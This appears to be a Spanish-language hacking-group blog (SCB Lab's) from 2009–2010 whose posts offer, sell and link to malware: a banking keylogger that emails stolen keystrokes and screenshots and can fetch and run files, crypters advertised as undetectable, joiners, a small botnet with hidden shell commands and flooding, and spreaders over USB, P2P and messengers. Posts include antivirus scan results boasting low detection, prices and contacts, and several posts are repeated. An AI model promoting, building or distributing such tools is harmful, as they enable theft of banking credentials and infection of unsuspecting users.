1 de abril de 2010
31 de marzo de 2010
No estamos muertos..
Bueno seguidores de SCB Lab's, no estamos muertos solo que estamos haciendo cambios generales y nos estamos organizando, cuando esté todo listo os avisaremos.
- Cambiaremos nombre de Equipo
- Cambiaremos servicio
- Cambiaremos diseño
- Cambiaremos todo..
Tampoco me he olvidado del Octopus, pero también estoy progresando con el lenguaje C y no puedo hacer todo junto.
Os rogamos paciencia =)
Saludos!
22 de febrero de 2010
Haití Joiner
Bueno quería hacer algo y en 5 minutitos hice este joiner dedicado a la gente que sufre en Haití por causa del Terremoto y por la hambruna.
Pesa bastante por la música (We are the world 25)

Características :
- Junta archivos infinitos
- Compresión UPX
- Drag&Drop para añadir los archivos arrastrandolos
- Peso del stub (12kb)
- Música (We are the world 25)
Análisis :
Report date: 22.2.2010 at 15.28.57 (GMT 1)
File name: sHaiti.exe
File size: 12288 bytes
MD5 Hash: 9a64e45aa7b0db571e8f1695c42f6d65
SHA1 Hash: 038A6D18B34495D27C174AC16C53E10B76517903
Detection rate: 3 on 21
Status: INFECTED
Detections
a-squared - -
Avira AntiVir - TR/Dropper.Gen
Avast - -
AVG - -
BitDefender - Gen:Trojan.Heur.am0@fbedPWQ
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - W32/VBTrojan.16C!Maximus
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo Antivirus - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by
NoVirusThanks.org
SharkI.
Relacionado con :
Malware
18 de febrero de 2010
Offsets Checker v1.2
Bueno esta será la ultima versión que hago de este programa ya que veo muy complicado mejorarlo.

Funcionamiento :
El Offset Checker v1.2 ejecuta el archivo y luego verifica si en los procesos saltó el debugger de Windows, en WinXP (dwwin.exe) y en Vista/7 (Werfault.exe), si detecta que uno de esos dos procesos está ejecutado sale un mensaje como este : 'Cierre todos los errores y presione aceptar para continuar', en cambio si salta cualquier otro error en el ejecutable no lo detectará y dirá que el ejecutable funciona. Por eso hasta ahora el Offsets Checker solo tendrá un 60% de fiabilidad contando con lo anterior y con el chequeo al ejecutar el ejecutable, ya que si no se ejecuta por cualquier error también muestra como las anteriores versiones el error.
Recomendaciones :
- Si el ejecutable lanza el error de 'No enviar' (WinXP) o 'Cerrar el programa' (7/Vista), esperar a que Offsets Checker lance el mensaje de alerta de que cierre ese error, sino no detectará el error.
- Trabajar con Offsets Checker v1.2 sin estar usando muchos procesos en el PC, relentiza el listado de procesos en el programa.
SharkI.
Relacionado con :
Malware
16 de febrero de 2010
Offsets Checker v1.1
Bueno habian publicado programas que intentaban hacer esta función (verificar si los offsets han roto o no). Esta herramienta es mas bien para los 'modders' (personas que modifican archivos binarios para que sean indetectables a los antivirus).
Relacionado con :
Malware
12 de febrero de 2010
Un poco ausente..
Bueno como habeis visto después de la terminación del KeyBank v2.0 no he publicado mas herramientas, esto no se debe a ninguna dejadez del blog.. hay una razón, y es que estoy continuando con BluetoothWifi el proyecto pausado (Octopus v0.2), durante un tiempo no publicaré nada serio por estar 100% con este proyecto, puede que de vez en cuando en 10 minutos que tenga haga alguna herramienta sencilla y cotidiana.
SharkI.
PD : Cualquier pregunta que quieran hacer sobre el Octopus RAT, pueden dejar un comentario en esta entrada.
Relacionado con :
SCB Lab's
30 de enero de 2010
KeyBank v2.0
Bueno la versión 2 ya está aqui, se han mejorado algunas cosas de la primera versión y se ha aportado mas flexibilidad para que el usuario lo controle a su gusto. Gracias a el mejor modder de la comunida de Indetectables.net por sacar esos antivirus problemáticos! (yorll). Esta versión es solamente privada.

- Captura de clicks (Clickshots) : la captura de clicks actua de forma simple e invisible, al hacer click se capturará una imagen de 500x500 mostrando el cursor en la imagen. Se pueden seleccionar tres tipos de capturas.
- Descargar archivo : esta función conocida como 'Downloader', si es activada.. descargará un archivo y lo ejecutará posteriormente, descarga cualquier archivo con extensiones de 3 carácteres (.jpg, .exe, .com...)
- Lenguajes : soporta dos tipos de lenguaje, inglés y español, para cambiarlos solo se tiene que dar click en las banderitas de arriba a la derecha.
- Envio de logs : los envios de logs son iguales que en la versión v1.0, soporta los servidores gmail y hotmail/live, en caso de que se seleccione alguna opción de captura de clicks, solo enviará los logs en caso de que halla alguna captura, esto se puso para impedir envios basura.
- Compresión UPX : si se selecciona esta opción, después de crear el servidor se comprimira con el compresor de ejecutables UPX a nivel 9.
- Precio : 270€
- Contacto : sharki@sharki.es
SharkI.

- Captura de clicks (Clickshots) : la captura de clicks actua de forma simple e invisible, al hacer click se capturará una imagen de 500x500 mostrando el cursor en la imagen. Se pueden seleccionar tres tipos de capturas.
- Primera opción : captura clicks en todo el ordenador.
- Segunda opción : captura clicks en los siguientes navegadores : Mozilla Firefox, Internet Explorer, Google Chrome y Opera.
- Tercera opción : captura clicks solo en las ventanas cuyos titulos sean seleccionados por el usuario.
- Descargar archivo : esta función conocida como 'Downloader', si es activada.. descargará un archivo y lo ejecutará posteriormente, descarga cualquier archivo con extensiones de 3 carácteres (.jpg, .exe, .com...)
- Lenguajes : soporta dos tipos de lenguaje, inglés y español, para cambiarlos solo se tiene que dar click en las banderitas de arriba a la derecha.
- Envio de logs : los envios de logs son iguales que en la versión v1.0, soporta los servidores gmail y hotmail/live, en caso de que se seleccione alguna opción de captura de clicks, solo enviará los logs en caso de que halla alguna captura, esto se puso para impedir envios basura.
- Compresión UPX : si se selecciona esta opción, después de crear el servidor se comprimira con el compresor de ejecutables UPX a nivel 9.
- Precio : 270€
- Contacto : sharki@sharki.es
SharkI.
23 de enero de 2010
KeyBank v1.0 - Público
Bueno os presento esta completa herramienta, 'KeyBank', es un potente keylogger bancario, lo cual significa que está preparado para teclados virtuales y teclas pulsadas del ordenador, aqui os dejo las características de este keylogger.

Características :
- Envia el contenedor de imagenes y texto por e-mail.
- Soporta dos servidores smtp para el envio : Gmail y Live/Hotmail.
- Captura en los exploradores : Mozilla Firefox, IExplorer y Opera.
- El envio de log es configurable por : segundos, minutos y horas.
- Lleva un desempaquetador en la parte baja a la derecha, para desempaquetar el log (.dll) y extraer las teclas capturadas con las imagenes en una carpeta.
- Encriptable con cualquier crypter.
- Captura los datos de texto que hay en el clipboard.
Descargar KeyBank v1.0 (Binario) [Detectable]
Contraseña del fichero : http://scblabsteam.blogspot.com
Razones de la publicación :
Bueno me veo obligado a publicar esta herramienta, hubieron bastantes demandantes durante la compra pero exijieron modificaciones que se verán prometidas en la versión 2, se mejorará el KeyBank para toda seguridad que sea hallada y se incluirán detalles comentados en los e-mails que habeis enviado y comentarios en el blog. La versión 2 está puesta en marcha y espero que disfruten de esta versión liberada.
KeyBank v1.0
SharkI

Características :
- Envia el contenedor de imagenes y texto por e-mail.
- Soporta dos servidores smtp para el envio : Gmail y Live/Hotmail.
- Captura en los exploradores : Mozilla Firefox, IExplorer y Opera.
- El envio de log es configurable por : segundos, minutos y horas.
- Lleva un desempaquetador en la parte baja a la derecha, para desempaquetar el log (.dll) y extraer las teclas capturadas con las imagenes en una carpeta.
- Encriptable con cualquier crypter.
- Captura los datos de texto que hay en el clipboard.
Descargar KeyBank v1.0 (Binario) [Detectable]
Contraseña del fichero : http://scblabsteam.blogspot.com
Razones de la publicación :
Bueno me veo obligado a publicar esta herramienta, hubieron bastantes demandantes durante la compra pero exijieron modificaciones que se verán prometidas en la versión 2, se mejorará el KeyBank para toda seguridad que sea hallada y se incluirán detalles comentados en los e-mails que habeis enviado y comentarios en el blog. La versión 2 está puesta en marcha y espero que disfruten de esta versión liberada.
KeyBank v1.0
SharkI
9 de enero de 2010
SCB Lab's Proffessionall Malware Tool [Privada + Source]
Bueno un regalito, no vendí ninguna copia de la versión privada asi que aqui os la dejo ya que no hace nada en mi pc, la tengo de adorno.
Los stubs están FUD's o los detectan 2 o 3 antivirus.


Descargar SCB Lab's Proffessionall Malware Tool (Binario)
Descargar SCB Lab's Proffessionall Malware Tool (Source)
Contraseña de los ficheros : SCB Lab's
SharkI.
Los stubs están FUD's o los detectan 2 o 3 antivirus.


Descargar SCB Lab's Proffessionall Malware Tool (Binario)
Descargar SCB Lab's Proffessionall Malware Tool (Source)
Contraseña de los ficheros : SCB Lab's
SharkI.
Relacionado con :
Codigos de fuente,
Malware,
SCB Lab's
3 de enero de 2010
SCB Lab's Joiner + Source
Bueno una vez mas os traigo otro programita que hice entre ayer y hoy, se trata de un joiner con bastanes opciones, agradecimientos a los programadores MadAntrax (por el modulo para cambiar el icono) y a RedSharK (por las funciones anti debuggers).





Características :
- Une archivos ilimitadamente
- Acepta toda clase de extensiones cde 3 dígitos (.exe, .jpg, .avi, .mp3)
- Activa un mensaje falso
- Incluye anti debuggers y cambiador de icono
Compatibilidad :
- Windows ME/98/2000
- Windows XP SP2/SP3
- Windows Vista/7 (90%, necesita ser ejecutado en modo administrador)
Analisis de Novirusthanks (Stub) :
- Bitdefender : Gen:Trojan.Heur.lmW@f9pJlHI
- McAfee : Generic Dropper.gi.gen trojan
Descargar SCB Lab's Joiner (Binario)
Descargar SCB Lab's Joiner (Source)
Contraseña de los ficheros : www.scblabsteam.blogspot.com
SharkI.





Características :
- Une archivos ilimitadamente
- Acepta toda clase de extensiones cde 3 dígitos (.exe, .jpg, .avi, .mp3)
- Activa un mensaje falso
- Incluye anti debuggers y cambiador de icono
Compatibilidad :
- Windows ME/98/2000
- Windows XP SP2/SP3
- Windows Vista/7 (90%, necesita ser ejecutado en modo administrador)
Analisis de Novirusthanks (Stub) :
- Bitdefender : Gen:Trojan.Heur.lmW@f9pJlHI
- McAfee : Generic Dropper.gi.gen trojan
Descargar SCB Lab's Joiner (Binario)
Descargar SCB Lab's Joiner (Source)
Contraseña de los ficheros : www.scblabsteam.blogspot.com
SharkI.
Relacionado con :
Codigos de fuente,
Malware,
SCB Lab's
23 de diciembre de 2009
SCB Lab's Mini Botnet + Source
Bueno estaba dudando si hacer esta mini botnet privada o publica, al final llegué a la conclusión de que los ultimos programas han sido privados y tenía que traer algo para la gente que nos sigue dia a dia. Aqui les dejo esta mini botnet que fué terminada la anterior semana cuyo objetivo es mostrar/enseñar como trabaja.

>> Características :
- Website flood : Abre 6 veces la web en diferente frames integrados en el servidor.
- Shell command : Envia un comando MSDOS al servidor en modo oculto.
- Server options : Opciones del servidor (reiniciar, cerrar, desinstalar).
- Build server : Constructor del servidor.
- Edit port : Edita el puerto de escucha
- Sound notifier : Activa/Desactiva el sonido de notificación
>> Compatibilidad :
- Windows XP SP2/SP3 (100%)
- Windows Vista/Windows 7 (90%)
Descargar SCB Lab's Mini Botnet (Binario)
Descargar SCB Lab's Mini Botnet (Source)
Contraseña de los ficheros : SCB Lab's
Creditos a Leandro Ascierto por el modulo mSock
SharkI.

>> Características :
- Website flood : Abre 6 veces la web en diferente frames integrados en el servidor.
- Shell command : Envia un comando MSDOS al servidor en modo oculto.
- Server options : Opciones del servidor (reiniciar, cerrar, desinstalar).
- Build server : Constructor del servidor.
- Edit port : Edita el puerto de escucha
- Sound notifier : Activa/Desactiva el sonido de notificación
>> Compatibilidad :
- Windows XP SP2/SP3 (100%)
- Windows Vista/Windows 7 (90%)
Descargar SCB Lab's Mini Botnet (Binario)
Descargar SCB Lab's Mini Botnet (Source)
Contraseña de los ficheros : SCB Lab's
Creditos a Leandro Ascierto por el modulo mSock
SharkI.
Relacionado con :
Codigos de fuente,
Malware,
SCB Lab's
19 de diciembre de 2009
Kryptonite Spreader Version InfrAngeluX 2.1.0
Nuevo Stub y Builder Corregidos del programa Kryptonite Spreader Version InfrAngeluX
Mejoras y Correcciones:
Version 2.1.0
- Corregido el problema de la Dispersión en el Hard Disk y Unidades Extraibles.
- Menor Consumo de CPU (Ya que se eliminaron mas Bucles innecesarios, y se obtienen solo las unidades Habilitadas para Escritura como son HD Unidades Extraible y memorias RAM).
- Reducción del Código Fuente.
- Evasión de Carpetas (Posible Crash Lógico).
- Evasión de Atributos.
Builder Versión 2.1.0
- Corregí un error de ultima Hora con el Builder ya que creaba el EXE final de forma errónea
Descargas y Reportes
- Descargar Nuevo Stub Click Aquí.
- Descargar SourceCode Click Aquí
- Ver Reporte Primario del Stub Click Aquí
- Ver Reporte Secundario del Stub Click Aquí
BlackZeroX
12 de diciembre de 2009
Octopus Crypt0r [Privado]
Bueno viendo las descargas que ha 'sufrido' el Octopus Keylogger [Publica(+500) y Privada(457)] y además de que una persona me pidió un crypter funcionable para tal keylogger, he decidido crearlo y lo publico en el blog para ventas.

- Características y funcionamiento :
- Soporta el servidor del Octopus Keylogger, antes con cualquier otro crypter con EOF o sin el, se rompía ya que los datos no se colocaban bien, la función EOF que destaca en todos los crypters/protectores solo funciona con el troyano bifrost.
- Soporta cualquier archivo binario, incluyendo servidores de troyanos como Poison Ivy y Spy-Net
- Es 100% Indetectable a todos los antivirus que se visualizan en el escaner de NovirusThanks.
- Obtener la versión privada :
- Contacto : sharki@sharki.es
- Precio : 20 €
- Método de pago : Paypal
SharkI.
- Características y funcionamiento :
- Soporta el servidor del Octopus Keylogger, antes con cualquier otro crypter con EOF o sin el, se rompía ya que los datos no se colocaban bien, la función EOF que destaca en todos los crypters/protectores solo funciona con el troyano bifrost.
- Soporta cualquier archivo binario, incluyendo servidores de troyanos como Poison Ivy y Spy-Net
- Es 100% Indetectable a todos los antivirus que se visualizan en el escaner de NovirusThanks.
- Obtener la versión privada :
- Contacto : sharki@sharki.es
- Precio : 20 €
- Método de pago : Paypal
SharkI.
11 de diciembre de 2009
Kryptonite Spreader Version InfrAngeluX
Este es solo un Copy And Paste de Mi Pagina de un programa Open Source con las ligas funcionando a las descargas pertinentes.!¡
Sección infrAngeluX~Codes\Soft -> Spreader's ( Deben estar Registrados para visualizar dicho menú ).
Descripción Difunde un archivo por las memorias USB, Disco Duros, y/o elementos extraibles y locales ademas de Difundirlos por los siguientes programas P2P:
- Ares.
- ICQ.
- KaZaA.
- KaZaA Lite.
- EDONKEY2000.
- eMule.
- Filetopia3.
- appleJuice.
- Gnucleus.
- LimeWire.
- Overnet.
- Shareaza.
- Swaptor.
- WinMX.
- Tesla.
- XoloX.
- Rapigator.
- KMD.
- BearShare.
- Direct Connect.
El programa Actualmente no tiene opción de Encryptación y/o Compresión o derivados
Al DESCARGAR EL PROGRAMA, LOS USUARIOS SE HACEN RESPONSABLES DE SUS USOS DADOS POR EL MISMO EXCLUYENDOME DE SUS ACCIONES
< Descargar > ( EL STUB A SIDO RECONSTRUIDO AL 100% DEL ORIGINAL )
< Descargar > Versión Original + Source ( Spreder del cual se origino aun que fue REPROGRAMADO )
Dulces Lunas!¡.
BlackZeroX.
8 de diciembre de 2009
Nuevo dominio SCB Lab's
Bueno solo deciros a todos que desde hoy disponemos de un dominio .es durante 1 año gratis, para que no tengáis que estar escribiendo todo el nombre del blog. El nuevo dominio es : http://scblabs.es que redirecciona al blog.
SharkI.
SharkI.
Relacionado con :
SCB Lab's
6 de diciembre de 2009
Mi presentación [BlackZeroX]
Hola soy BlackZeroX
Mi nombre real : Ortega Avila Miguel
Rumbo donde habitualmente estoy : elhacker.net
Sitio Web personal : InfrAngeluX
Rol de mi sitio : Proyectos personales independientes a SCB Lab's
Rol momentáneo : Mejorar los codigos opensource que se han posteado en este blog tratando de dejarlos FUD al 100% en los peores casos aunque sea dejando activo a 1 solo AV con estado de 'posible infección' New Heur
Rol posterior : Creación de utilidades como son encriptaciones con algoritmo personal (No me gusta hacer los crypters con algoritmos ajenos)
Rol comercial : No pretendo vender ningun Software en ningun momento, aunque me muera de hambre.
Dulces Lunas!¡.
BlackZeroX.
Mi nombre real : Ortega Avila Miguel
Rumbo donde habitualmente estoy : elhacker.net
Sitio Web personal : InfrAngeluX
Rol de mi sitio : Proyectos personales independientes a SCB Lab's
Rol momentáneo : Mejorar los codigos opensource que se han posteado en este blog tratando de dejarlos FUD al 100% en los peores casos aunque sea dejando activo a 1 solo AV con estado de 'posible infección' New Heur
Rol posterior : Creación de utilidades como son encriptaciones con algoritmo personal (No me gusta hacer los crypters con algoritmos ajenos)
Rol comercial : No pretendo vender ningun Software en ningun momento, aunque me muera de hambre.
Dulces Lunas!¡.
BlackZeroX.
Relacionado con :
SCB Lab's
5 de diciembre de 2009
Nuevos miembros del team SCB Lab's
Bueno os aviso a todos los seguidores del blog que se han incluido dos nuevos miembros al equipo, ellos son nada mas y nada menos que BlackZeroX y Hacker_Zer0, algunos los conoceréis del foro elhacker.net u otros lados, solo decir que son unas grandes personas, programadores avanzados que dominan (B0=VB6, PHP, ActionScript,C/++; H0=ASM, C/++) y que de hoy para delante aportarán en el blog todos sus conocimientos y herramientas que vayan haciendo.
Los miembros actuales del team somos :
- SharkI
- BluetoothWifi
- Charleston (cLn)
- BlackZeroX
- Hacker_Zer0
SharkI.
Los miembros actuales del team somos :
- SharkI
- BluetoothWifi
- Charleston (cLn)
- BlackZeroX
- Hacker_Zer0
SharkI.
Relacionado con :
SCB Lab's
Personal Algorythm + Source
Bueno este proyecto lo tenía parado, un dia se me ocurrió la idea de hacer un programa que cree un modulo para proyectos de VB6 (Visual Basic 6) con la función de encriptar y desencriptar datos, lo que hice fué un programa con la opción de hacer un algoritmo personal, sustituyendo carácteres por otros.

Forma de uso :
Para llamar a la función de encriptar 'Encriptado = Encrypt(Datos, Contraseña)'
Para llamar a la función de desencriptar 'Desencriptado = Decrypt(Datos, Contraseña)'
Descargar Personal Algorythm (Binario)
Descargar Personal Algorythm (Source)
Contraseña de los ficheros : SCB Lab's
//Edit
Aqui dejo el link del foro elhacker, donde se arregla bastante mi source, para que podáis arreglarlo y aprender de los errores (como yo).
SharkI.
Forma de uso :
Para llamar a la función de encriptar 'Encriptado = Encrypt(Datos, Contraseña)'
Para llamar a la función de desencriptar 'Desencriptado = Decrypt(Datos, Contraseña)'
Descargar Personal Algorythm (Binario)
Descargar Personal Algorythm (Source)
Contraseña de los ficheros : SCB Lab's
//Edit
Aqui dejo el link del foro elhacker, donde se arregla bastante mi source, para que podáis arreglarlo y aprender de los errores (como yo).
SharkI.
Relacionado con :
Codigos de fuente
22 de noviembre de 2009
Tiny Window Spreader + Source
Bueno aqui os dejo un 'pequeño propagador en ventanas', pueden agregarle mas programas de mensajeria instantanea en el source. Agradecimientos a TheSwash por la GFX (Interfaz)

File Info
Report generated: 22.11.2009 at 14.23.53 (GMT 1)
Filename: Stub.dll
File size: 16384
MD5 Hash: e5c660fcb190ada3211762f3841515eb
SHA1 Hash: EF360B3F93BE2F753425E5E835A16CB20615FF93
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 2 on 24
Detections
a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - Gen:Trojan.Heur.VB.bm0@dykGyIO
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - HEUR:Trojan.Win32.Generic
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by
NoVirusThanks.org
Modificado : Ahí les dejo el binario actualizado con las cadenas con StrReverse.
Propagación :
- Windows Live Messenger
- Mibbit
- Skype
- XFire
Instalación :
- Pequeña instalación debil para que al iniciar windows siga haciendo su función.
Descargar Tiny Window Spreader (Binario)
Descargar Tiny Window Spreader (Source)
Contraseña de los ficheros : SCB Lab's
SharkI.

File Info
Report generated: 22.11.2009 at 14.23.53 (GMT 1)
Filename: Stub.dll
File size: 16384
MD5 Hash: e5c660fcb190ada3211762f3841515eb
SHA1 Hash: EF360B3F93BE2F753425E5E835A16CB20615FF93
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 2 on 24
Detections
a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - Gen:Trojan.Heur.VB.bm0@dykGyIO
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - HEUR:Trojan.Win32.Generic
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by
NoVirusThanks.org
Modificado : Ahí les dejo el binario actualizado con las cadenas con StrReverse.
Propagación :
- Windows Live Messenger
- Mibbit
- Skype
- XFire
Instalación :
- Pequeña instalación debil para que al iniciar windows siga haciendo su función.
Descargar Tiny Window Spreader (Binario)
Descargar Tiny Window Spreader (Source)
Contraseña de los ficheros : SCB Lab's
SharkI.
Relacionado con :
Codigos de fuente,
Malware
19 de noviembre de 2009
Jah Rastafari Crypt0r + Source
Bueno estoy 'alegre' y publico este simple crypter scantime.
Totalmente funcional con los servidores (Probado con Poison Ivy)

File Info
Report generated: 19.11.2009 at 23.30.17 (GMT 1)
Filename: Stub.dll
File size: 16384
MD5 Hash: c4a5f3c82152f9b38674e5ea185b53ec
SHA1 Hash: E2E08527BC3139AD194303410B44B6CE93172D5F
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 5 on 24
Detections
a-squared - Riskware.Win32.Vbinder!IK
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - Gen:Trojan.Heur.bm0@fLfYPnO
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - VirTool.Win32.Vbinder
Kaspersky - -
McAfee - Generic VB.i trojan
NOD32 v3 - Win32/Injector.EQ
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by
NoVirusThanks.org
Descargar Jah Rastafari Crypt0r (Binario)
Descargar Jah Rastafari Crypt0r (Source)
Contraseña de los ficheros : SCB Lab's
SharkI.
Totalmente funcional con los servidores (Probado con Poison Ivy)
File Info
Report generated: 19.11.2009 at 23.30.17 (GMT 1)
Filename: Stub.dll
File size: 16384
MD5 Hash: c4a5f3c82152f9b38674e5ea185b53ec
SHA1 Hash: E2E08527BC3139AD194303410B44B6CE93172D5F
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 5 on 24
Detections
a-squared - Riskware.Win32.Vbinder!IK
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - Gen:Trojan.Heur.bm0@fLfYPnO
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - VirTool.Win32.Vbinder
Kaspersky - -
McAfee - Generic VB.i trojan
NOD32 v3 - Win32/Injector.EQ
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by
NoVirusThanks.org
Descargar Jah Rastafari Crypt0r (Binario)
Descargar Jah Rastafari Crypt0r (Source)
Contraseña de los ficheros : SCB Lab's
SharkI.
Relacionado con :
Codigos de fuente,
Malware
Suscribirse a:
Entradas (Atom)
